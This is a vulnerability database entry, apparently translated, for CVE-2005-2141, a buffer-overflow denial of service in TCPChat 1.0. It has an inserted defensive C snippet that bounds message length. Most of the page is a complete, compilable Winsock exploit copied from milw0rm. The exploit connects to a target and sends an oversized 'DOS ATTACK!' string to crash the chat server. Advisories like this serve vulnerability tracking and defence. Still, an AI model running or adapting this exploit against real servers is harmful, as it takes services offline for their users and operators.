TCPChat Denial-of-Service Vulnerability

Vulnerability ID: 1108920 | Vulnerability type: buffer overflow
Published: 2005-07-06 | Updated: 2005-07-06
CVE ID: CVE-2005-2141
CNNVD-ID: CNNVD-200507-001
Platform: Windows | CVSS score: 5.0
|Vulnerability sources
https://www.exploit-db.com/exploits/1090
https://www.securityfocus.com/bid/89793
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200507-001
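|Vulnerability details
TCPChat is a small chat program. TCPChat 1.0 contains a denial-of-service vulnerability. A remote attacker can send an overly long chat string, which may trigger a buffer overflow, crash the program and cause a denial of service.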
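A defensive counterpart to the flaw described above, as an added example that is not TCPChat's code or part of the original advisory: a receive buffer that rejects an oversized chat message instead of copying it. The 256-byte limit and the names `chat_buf`, `chat_append` and `chat_feed` are hypothetical, chosen for illustration, and the input is constructed filler.

```c
#include <stdio.h>
#include <string.h>

#define CHAT_MAX 256   /* assumed per-message limit; the page gives none */

struct chat_buf {                /* zero-initialise before first use */
    char   data[CHAT_MAX + 1];   /* +1 for the terminating NUL */
    size_t used;                 /* bytes stored so far, always <= CHAT_MAX */
    int    overflowed;           /* sticky flag: caller should drop the peer */
};

/* Append one recv() chunk. Returns 0 on success, or -1 without copying when
 * the message would exceed CHAT_MAX. Subtracting avoids wrap-around on len. */
int chat_append(struct chat_buf *b, const char *chunk, size_t len)
{
    if (b->overflowed || len > CHAT_MAX - b->used) {
        b->overflowed = 1;
        return -1;
    }
    memcpy(b->data + b->used, chunk, len);
    b->used += len;
    b->data[b->used] = '\0';
    return 0;
}

/* Constructed input: reset b, feed `total` filler bytes in `step`-byte
 * chunks, and return how many chunks were accepted before a rejection. */
size_t chat_feed(struct chat_buf *b, size_t total, size_t step)
{
    char chunk[128];
    size_t accepted = 0;
    if (step == 0 || step > sizeof chunk) return 0;
    memset(b, 0, sizeof *b);
    memset(chunk, 'A', sizeof chunk);
    while (total > 0) {
        size_t n = total < step ? total : step;
        if (chat_append(b, chunk, n) != 0) break;
        accepted++;
        total -= n;
    }
    return accepted;
}

int main(void)
{
    struct chat_buf b;
    size_t ok = chat_feed(&b, 1150, 100);   /* oversized constructed message */
    printf("accepted %zu chunks, overflowed=%d\n", ok, b.overflowed);
    return 0;
}
```

Once `overflowed` is set, the caller should close the connection rather than keep reading, so a single oversized message costs the server one socket and not the process.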
|Exploit (EXP)
/*

TCP Chat(TCPX) DoS Exploit
----------------------------------------

Resolve host... [OK]
[+] Connecting... [OK]
Target locked
Sending bad procedure... [OK]
[+] Server DoS'ed

Tested on Windows2000 SP4
Info: infamous.2hell.com / [email protected]

*/

#include <string.h>
#include <stdlib.h>
#include <winsock2.h>
#include <stdio.h>

#pragma comment(lib, "ws2_32.lib")

char doscore[] =
"*** TCP Chat 1.0 DOS Exploit \n"
"***-----------------------------------------------\n"
"*** Infam0us Gr0up - Securiti Research Team \n\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n";


int main(int argc, char *argv[])
{
    WSADATA wsaData;
    WORD wVersionRequested;
    struct hostent *pTarget;
    struct sockaddr_in sock;
    char *target;
    int port,bufsize;
    SOCKET inetdos;

    if (argc < 2)
    {
        printf(" TCP Chat(TCPX) DoS Exploit \n");
        printf(" ------------------------------------------\n");
        printf(" Infam0us Gr0up - Securiti Research\n\n");
        printf("[-]Usage: %s [target] [port]\n", argv[0]);
        printf("[?]Exam: %s localhost 1234\n", argv[0]);
        exit(1);
    }

    /* WSAStartup returns 0 on success and a positive error code on failure */
    wVersionRequested = MAKEWORD(1, 1);
    if (WSAStartup(wVersionRequested, &wsaData) != 0) return -1;

    target = argv[1];
    port = 1234;

    if (argc >= 3) port = atoi(argv[2]);
    bufsize = 1024; /* parsed but never used below */
    if (argc >= 4) bufsize = atoi(argv[3]);

    inetdos = socket(AF_INET, SOCK_STREAM, 0);
    if(inetdos==INVALID_SOCKET)
    {
        printf("Socket ERROR \n");
        exit(1);
    }
    printf(" TCP Chat(TCPX) DoS Exploit \n");
    printf(" ------------------------------------------\r\n\n");
    printf("Resolve host... ");
    if ((pTarget = gethostbyname(target)) == NULL)
    {
        printf("FAILED \n");
        exit(1);
    }
    printf("[OK]\n ");
    memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
    sock.sin_family = AF_INET;
    sock.sin_port = htons((USHORT)port);

    printf("[+] Connecting... ");
    if ( (connect(inetdos, (struct sockaddr *)&sock, sizeof (sock) )))
    {
        printf("FAILED\n");
        exit(1);
    }
    printf("[OK]\n");
    printf("Target locked\n");
    printf("Sending bad procedure... ");
    /* Send the long chat string described in the advisory */
    if (send(inetdos, doscore, sizeof(doscore)-1, 0) == -1)
    {
        printf("ERROR\n");
        closesocket(inetdos);
        exit(1);
    }
    printf("[OK]\n ");
    printf("[+] Server DoS'ed\n");
    closesocket(inetdos);
    WSACleanup();
    return 0;
}

// milw0rm.com [2005-07-06]
|Affected products
Jollybox.De Tcp Chat 1.0
|References

Source: SECTRACK
Name: 1014371
Link: http://securitytracker.com/id?1014371
Source: MISC
Link: http://k.domaindlx.com/shellcore/advisories.asp?bug_report=display&infamous_group=65
Source: MISC
Link: http://addict3d.org/index.php?page=viewarticle&type=security&ID=4377
